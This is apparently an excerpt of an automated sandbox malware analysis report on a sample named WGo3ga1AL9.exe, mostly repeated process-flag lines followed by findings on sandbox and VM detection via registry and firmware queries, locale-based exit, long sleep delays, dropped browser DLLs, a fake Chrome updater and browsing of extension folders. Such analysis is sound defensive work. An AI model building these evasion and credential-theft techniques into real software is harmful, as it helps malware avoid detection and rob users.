                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Found evasive API chain (may stop execution after checking locale)
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-73616
                    Query firmware table information (likely to detect VMs)
                    Source: C:\ProgramData\GDBFCGIIIJ.exeSystem information queried: FirmwareTableInformationJump to behavior
                    Source: C:\ProgramData\Google\Chrome\updater.exeSystem information queried: FirmwareTableInformation
                    Tries to detect sandboxes / dynamic malware analysis system (registry check)
                    Source: C:\ProgramData\GDBFCGIIIJ.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\ProgramData\Google\Chrome\updater.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                    Source: C:\ProgramData\Google\Chrome\updater.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                    Source: C:\ProgramData\Google\Chrome\updater.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                    Source: C:\ProgramData\Google\Chrome\updater.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4901Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4885Jump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeDropped PE file which has not been started: C:\ProgramData\chrome.dllJump to dropped file
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dllJump to dropped file
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dllJump to dropped file
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dllJump to dropped file
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dllJump to dropped file
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dllJump to dropped file
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dllJump to dropped file
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeAPI coverage: 6.0 %
                    Source: C:\Windows\System32\svchost.exe TID: 8168Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\svchost.exe TID: 8168Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7464Thread sleep count: 4901 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7728Thread sleep count: 4885 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7964Thread sleep time: -9223372036854770s >= -30000sJump to behavior
                    Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_004140F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,0_2_004140F0
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_0040E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0040E530
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_0040BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,memset,lstrcatA,lstrcatA,lstrcatA,memset,lstrcatA,lstrcatA,lstrcatA,memset,lstrcatA,lstrcatA,lstrcatA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0040BE40
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_00414B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00414B60
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_0040DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,LCMapStringW,0_2_0040DF10
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_00401710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00401710
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_0040DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0040DB80
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_0040F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040F7B0
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_0040EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0040EE20
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_00413B00 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00413B00
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_004147C0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,0_2_004147C0
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_00418060 GetSystemInfo,wsprintfA,0_2_00418060
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                    Source: updater.exe, 0000002D.00000002.2181071343.000001D4E183C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                    Source: WGo3ga1AL9.exe, 00000000.00000002.2313774503.00000000009D2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWN
                    Source: WGo3ga1AL9.exe, 00000000.00000002.2313774503.00000000009F2000.00000004.00000020.00020000.00000000.sdmp, WGo3ga1AL9.exe, 00000000.00000002.2313774503.000000000098E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2133755275.000001B303C60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: WGo3ga1AL9.exe, 00000000.00000002.2313774503.000000000098E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                    Source: svchost.exe, 00000002.00000002.2132616059.000001B30282B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW+
                    Source: GDBFCGIIIJ.exe, 00000009.00000002.2167896536.00000132B4B2C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__Z
                    Source: WGo3ga1AL9.exe, 00000000.00000002.2313774503.000000000098E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwareBu-
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeAPI call chain: ExitProcess graph end nodegraph_0-74779
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeAPI call chain: ExitProcess graph end nodegraph_0-73604
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeAPI call chain: ExitProcess graph end nodegraph_0-73601
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeAPI call chain: ExitProcess graph end nodegraph_0-73622
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeAPI call chain: ExitProcess graph end nodegraph_0-73623
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeAPI call chain: ExitProcess graph end nodegraph_0-73615
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeAPI call chain: ExitProcess graph end nodegraph_0-73644
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeAPI call chain: ExitProcess graph end nodegraph_0-73443
